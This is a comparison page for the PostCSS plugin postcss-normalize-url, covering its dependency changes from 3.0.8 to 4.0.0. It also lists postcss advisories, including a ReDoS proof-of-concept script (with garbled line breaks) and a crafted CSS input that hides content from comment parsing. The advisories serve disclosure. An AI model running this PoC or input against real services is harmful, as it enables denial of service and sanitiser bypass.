Postcss-normalize-url is a PostCSS plugin designed to normalize URLs within your CSS, providing a consistent and predictable experience. Version 4.0.0 represents a notable update from version 3.0.8, primarily concerning its dependencies. The most significant change is the required PostCSS version, jumping from ^5.0.14 to ^6.0.0. This indicates breaking changes in the PostCSS API were addressed, requiring an update for compatibility.
Other notable dependency updates include normalize-url, a core component for URL normalization, updated from version ^1.4.0 to ^3.0.0, likely incorporating newer normalization rules and features. Developers should investigate the breaking changes of this dependency when updating. Although is-absolute-url remained at ^2.0.0.
From a development perspective, version 3.0.8 utilized a wide array of development dependencies for testing, linting, and build processes, including Ava, ESLint, and various Babel plugins and presets. In contrast, version 4.0.0 streamlines the development dependencies to only include Babel-cli and cross-env. This suggests a shift in the build process or potentially a simplification of the testing and linting strategy.
Another relevant difference is dependency for PostCSS value parser, with version 3.0.8 requiring 3.2.3 and version 4.0.0 requiring ^3.0.0. The change from git+https://github.com/ben-eb/postcss-normalize-url.git to https://github.com/cssnano/cssnano.git on the repository url indicates a change of ownership of the package or at least the repository being tracked. This could suggest a change in maintainership or direction for the plugin. For those using PostCSS 6 or later, version 4.0.0 is the recommended choice. Existing users of version 3.0.8 should carefully review the dependency updates, particularly PostCSS and normalize-url, to ensure compatibility and smooth migration.
All the vulnerabilities related to the version 4.0.0 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.